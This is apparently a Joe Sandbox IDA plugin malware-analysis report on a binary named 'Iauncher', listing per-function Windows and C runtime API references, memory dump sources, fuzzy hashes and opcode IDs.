                                                                                                                                                    • Opcode Fuzzy Hash: 8a6cf238046ec857455d11c8359e1acd5237afb871821c75e4d8f62e076333f0
                                                                                                                                                    • Instruction Fuzzy Hash: E141A134A002099FCF11DF68C885A9EBFB9BF55328F148155EC19AB352DB31EA15CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 00564C73
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00564C7D
                                                                                                                                                    • int.LIBCPMT ref: 00564C94
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::_Lockit.LIBCPMT ref: 00562588
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::~_Lockit.LIBCPMT ref: 005625A2
                                                                                                                                                    • codecvt.LIBCPMT ref: 00564CB7
                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00564CCE
                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00564CEE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                    • String ID: SV
                                                                                                                                                    • API String ID: 712880209-4155469514
                                                                                                                                                    • Opcode ID: d73743043bda9673c5be8115582c67c76a3c37885dfe8b16038aa5bb427ff236
                                                                                                                                                    • Instruction ID: f5de7a57622beecd8774534e4e9349ab55918ea95e150e327b080cb5ef3ab352
                                                                                                                                                    • Opcode Fuzzy Hash: d73743043bda9673c5be8115582c67c76a3c37885dfe8b16038aa5bb427ff236
                                                                                                                                                    • Instruction Fuzzy Hash: 2911B135900616DBCB10EB64D8596AE7FE5FF94720F200419E802A7391EBB49E44CF81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetCPInfo.KERNEL32(00BF1E18,00BF1E18,?,7FFFFFFF,?,00580EFA,00BF1E18,00BF1E18,?,00BF1E18,?,?,?,?,00BF1E18,?), ref: 00580CD0
                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00580D8B
                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00580E1A
                                                                                                                                                    • __freea.LIBCMT ref: 00580E65
                                                                                                                                                    • __freea.LIBCMT ref: 00580E6B
                                                                                                                                                    • __freea.LIBCMT ref: 00580EA1
                                                                                                                                                    • __freea.LIBCMT ref: 00580EA7
                                                                                                                                                    • __freea.LIBCMT ref: 00580EB7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 127012223-0
                                                                                                                                                    • Opcode ID: 1a5f9b1b4584ddbc01ae110096770a1607760b62ef0f487310e39b39a78b84b2
                                                                                                                                                    • Instruction ID: 0d316a64c5d062e2c57175b3e17512b64573d73d9a9fd069552c86522265579d
                                                                                                                                                    • Opcode Fuzzy Hash: 1a5f9b1b4584ddbc01ae110096770a1607760b62ef0f487310e39b39a78b84b2
                                                                                                                                                    • Instruction Fuzzy Hash: A671C57290120A9BDF60BEA49C45BAFBFBABF85310F242559EC14B72C2D7759C488790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 00564635
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00564640
                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005646AE
                                                                                                                                                      • Part of subcall function 00564791: std::locale::_Locimp::_Locimp.LIBCPMT ref: 005647A9
                                                                                                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 0056465B
                                                                                                                                                    • _Yarn.LIBCPMT ref: 00564671
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                    • String ID: SV
                                                                                                                                                    • API String ID: 1088826258-4155469514
                                                                                                                                                    • Opcode ID: 533e022072aebb81baa7ca8366a3e29fe3c24ae435c748cbcdb6e13267218888
                                                                                                                                                    • Instruction ID: c347bddf2e8a470c86d367e3e16850d171363e35a6a8f193afce6b3507f8d2e9
                                                                                                                                                    • Opcode Fuzzy Hash: 533e022072aebb81baa7ca8366a3e29fe3c24ae435c748cbcdb6e13267218888
                                                                                                                                                    • Instruction Fuzzy Hash: FF015A79A00622DBCB05AF20D85957C7FA5FFE9750B244008EC0267382DF746A86EF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,940D2BD2,?,?,00000000,00582854,000000FF,?,00570E39,?,?,00570E0D,00000000), ref: 00570EDE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00570EF0
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00582854,000000FF,?,00570E39,?,?,00570E0D,00000000), ref: 00570F12
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll$SV
                                                                                                                                                    • API String ID: 4061214504-2182140240
                                                                                                                                                    • Opcode ID: 42ffa21f17e3eff22df792ded141e4a0748dff299a73ff95b4a02eb0dee73068
                                                                                                                                                    • Instruction ID: b82273f55f6e67b481589ac0348030729df884133c3e076940e8885013d8be70
                                                                                                                                                    • Opcode Fuzzy Hash: 42ffa21f17e3eff22df792ded141e4a0748dff299a73ff95b4a02eb0dee73068
                                                                                                                                                    • Instruction Fuzzy Hash: BB018F35A08619EFDB119B50DC09BAEBFB8FB04B14F004529FC11B22D0EB749804DF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4329cf0b1ec0e0d0fa983510b0dfe9e73dc4597977bcc9c90fd1f57c2844e0f3
                                                                                                                                                    • Instruction ID: 116983671770bfb005c8ebc09254bbc8df90132696700f292671054248ea24f3
                                                                                                                                                    • Opcode Fuzzy Hash: 4329cf0b1ec0e0d0fa983510b0dfe9e73dc4597977bcc9c90fd1f57c2844e0f3
                                                                                                                                                    • Instruction Fuzzy Hash: A9B12874A04246EFDB11DF98E845BAD7FB6BF98304F148169E808AB392C7709D41EF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,?,00569671,00569427,00566F4B), ref: 00569688
                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00569696
                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005696AF
                                                                                                                                                    • SetLastError.KERNEL32(00000000,00569671,00569427,00566F4B), ref: 00569701
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                    • Opcode ID: e279f82630b57ababc249e7c5db2317e8a96620b923796b9aab6e26131c8da0a
                                                                                                                                                    • Instruction ID: 442f11d7bbed9650a65acf0c49a35951b9c630a75807f10cf70a32af9bcfba0b
                                                                                                                                                    • Opcode Fuzzy Hash: e279f82630b57ababc249e7c5db2317e8a96620b923796b9aab6e26131c8da0a
                                                                                                                                                    • Instruction Fuzzy Hash: E301D832109312DEB61426B4BC8E65B3E5EFB933707300629F920771E0EFA24C05A742
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                    • String ID: SV
                                                                                                                                                    • API String ID: 1740715915-4155469514
                                                                                                                                                    • Opcode ID: b93075135d757a7346874a6a3c23f06f1d256ce12a7df57e964ab0b88de07730
                                                                                                                                                    • Instruction ID: b9e5e57c9506911c186973b3489b072b3a89d479b41a1cf2449727a42ccfd25c
                                                                                                                                                    • Opcode Fuzzy Hash: b93075135d757a7346874a6a3c23f06f1d256ce12a7df57e964ab0b88de07730
                                                                                                                                                    • Instruction Fuzzy Hash: 2B510472A00202DFEB299F54D845B7ABFACFF96310F14452DE80157295EB32EC41DB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strcspn
                                                                                                                                                    • String ID: LDX$PDX
                                                                                                                                                    • API String ID: 3709121408-807684381
                                                                                                                                                    • Opcode ID: 4818a6c9be67f60fb1a2ffb9ec22c797f347393d3fd8742831c7298b66181d7a
                                                                                                                                                    • Instruction ID: 75ec5dbcf26c819323a07bc63d32ab9c3805d24734d89931d35ff227c33cd848
                                                                                                                                                    • Opcode Fuzzy Hash: 4818a6c9be67f60fb1a2ffb9ec22c797f347393d3fd8742831c7298b66181d7a
                                                                                                                                                    • Instruction Fuzzy Hash: D7B175B5608741AFD720DF24C884A6BBBE9FFC9340F58491DF99987221DB30E905CB56
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0056A773,00000000,?,?,?,?,?,0056A89D,00000002,FlsGetValue,00585D40,FlsGetValue), ref: 0056A7CF
                                                                                                                                                    • GetLastError.KERNEL32(?,0056A773,00000000,?,?,?,?,?,0056A89D,00000002,FlsGetValue,00585D40,FlsGetValue,00000000,?,0056972D), ref: 0056A7D9
                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000000,?,0056972D,?,?,?,?,?,?), ref: 0056A801
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                    • Opcode ID: c7600847f615e1e5a7386321c0d9c39cf94df6e60dd316b0e7875ac1c6e58ef1
                                                                                                                                                    • Instruction ID: 8e8d8344ae6893387e4f144c4329ae7d7b1ed3333af092225c0b4072c663bd2c
                                                                                                                                                    • Opcode Fuzzy Hash: c7600847f615e1e5a7386321c0d9c39cf94df6e60dd316b0e7875ac1c6e58ef1
                                                                                                                                                    • Instruction Fuzzy Hash: CEE09A31690205F6EA212B61EC0EB5A3F55AB10B51F254020FE0DB91A1E762995AAE85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetConsoleOutputCP.KERNEL32(940D2BD2,00000000,00000000,00000000), ref: 005778D3
                                                                                                                                                      • Part of subcall function 00578FAF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00576B60,?,00000000,-00000008), ref: 0057905B
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00577B2E
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00577B76
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00577C19
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2112829910-0
                                                                                                                                                    • Opcode ID: 963f6a211c3bc76bbc1714018c0213975e7999cca38e2ccf5661af9442b5b5e1
                                                                                                                                                    • Instruction ID: 00520ba8292c05bc1c383d3b599368b130edaacfdf4cff2cd7b1b43d161425fa
                                                                                                                                                    • Opcode Fuzzy Hash: 963f6a211c3bc76bbc1714018c0213975e7999cca38e2ccf5661af9442b5b5e1
                                                                                                                                                    • Instruction Fuzzy Hash: 85D168B5D042599FCB01CFA8E8849ADBFB9FF4C300F18856AE859EB351E730A945DB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00578FAF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00576B60,?,00000000,-00000008), ref: 0057905B
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0057942F
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00579436
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 00579470
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00579477
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
• Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1913693674-0
                                                                                                                                                    • Opcode ID: 4ab44dba6ff8fb3fdfbbfa342591c3691c0b1e283bb320145b9a389f2a2d3d65
                                                                                                                                                    • Instruction ID: 538b4bca8fbb9c84516acb827cf2bb5d34800b0243456b5ae7db9b2a84ef3150
                                                                                                                                                    • Opcode Fuzzy Hash: 4ab44dba6ff8fb3fdfbbfa342591c3691c0b1e283bb320145b9a389f2a2d3d65
                                                                                                                                                    • Instruction Fuzzy Hash: C3219271200206AF9F20AF61AC89C6B7FAEFF84364710C919F91D97151D731EC11ABA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d4dfb705889c25b6fb19346a614ac34a07a3ae9ad799181cea6eb1d170d12bc6
                                                                                                                                                    • Instruction ID: e1ec0a13de9f59e9acbeca126295a998dd9db225988ea73624f82cd8fa4ae546
                                                                                                                                                    • Opcode Fuzzy Hash: d4dfb705889c25b6fb19346a614ac34a07a3ae9ad799181cea6eb1d170d12bc6
                                                                                                                                                    • Instruction Fuzzy Hash: 6321807A601216EF9B60AFA1EC4D82B7FE9FF50364710D915F95997182DB31EC00E7A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0057A369
                                                                                                                                                      • Part of subcall function 00578FAF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00576B60,?,00000000,-00000008), ref: 0057905B
                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0057A3A1
                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0057A3C1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 158306478-0
                                                                                                                                                    • Opcode ID: a6f73c5a2874d9d98cc42576d75c17be652c9739d315007deacc75f7c945e8a1
                                                                                                                                                    • Instruction ID: 782f21169363ae281e34ed7ea44e9c530e04ad86ee39b7afa3c762dc20dd0e70
                                                                                                                                                    • Opcode Fuzzy Hash: a6f73c5a2874d9d98cc42576d75c17be652c9739d315007deacc75f7c945e8a1
                                                                                                                                                    • Instruction Fuzzy Hash: B5118EF191561BBF66116BB17C8EC6F2D5CEFD52A43119824F80991101EF208D80A6B2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00561E09
                                                                                                                                                    • int.LIBCPMT ref: 00561E1C
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::_Lockit.LIBCPMT ref: 00562588
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::~_Lockit.LIBCPMT ref: 005625A2
                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00561E4F
                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00561E65
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 459529453-0
                                                                                                                                                    • Opcode ID: 56ab0aa4ea0e4f01f57d60bea57bd33e0285e0c2ef34f3ed4c7cfa3d7ba4a0b1
                                                                                                                                                    • Instruction ID: 4639e12f61cbd439b1e0bd5aaad5e678c55ab548b5e0dd4d35ba70440891d702
                                                                                                                                                    • Opcode Fuzzy Hash: 56ab0aa4ea0e4f01f57d60bea57bd33e0285e0c2ef34f3ed4c7cfa3d7ba4a0b1
                                                                                                                                                    • Instruction Fuzzy Hash: 3A01A732500515ABCB15ABA4D81A8AE7F78FFD1760F640558FD01AB290EB71DE41DB84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00561D90
                                                                                                                                                    • int.LIBCPMT ref: 00561DA3
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::_Lockit.LIBCPMT ref: 00562588
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::~_Lockit.LIBCPMT ref: 005625A2
                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00561DD6
                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00561DEC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 459529453-0
                                                                                                                                                    • Opcode ID: 0ad77154c395b2b4faac93a51f0c77427f1d4eca8267b441787550c286964a38
                                                                                                                                                    • Instruction ID: 750c7d248d1be03336e51b146f448a87ac55eb7ee91901ae8768833d2884c627
                                                                                                                                                    • Opcode Fuzzy Hash: 0ad77154c395b2b4faac93a51f0c77427f1d4eca8267b441787550c286964a38
                                                                                                                                                    • Instruction Fuzzy Hash: 9901A276900915ABCB15AB94D81A8BD7F78FFD0760F240158F902AB291EB309E81DB98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,0057F92B,00000000,00000001,00000000,00000000,?,00577C6D,00000000,00000000,00000000), ref: 00580A76
                                                                                                                                                    • GetLastError.KERNEL32(?,0057F92B,00000000,00000001,00000000,00000000,?,00577C6D,00000000,00000000,00000000,00000000,00000000,?,005781F4,00000000), ref: 00580A82
                                                                                                                                                      • Part of subcall function 00580A48: CloseHandle.KERNEL32(FFFFFFFE,00580A92,?,0057F92B,00000000,00000001,00000000,00000000,?,00577C6D,00000000,00000000,00000000,00000000,00000000), ref: 00580A58
                                                                                                                                                    • ___initconout.LIBCMT ref: 00580A92
                                                                                                                                                      • Part of subcall function 00580A0A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00580A39,0057F918,00000000,?,00577C6D,00000000,00000000,00000000,00000000), ref: 00580A1D
                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,0057F92B,00000000,00000001,00000000,00000000,?,00577C6D,00000000,00000000,00000000,00000000), ref: 00580AA7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
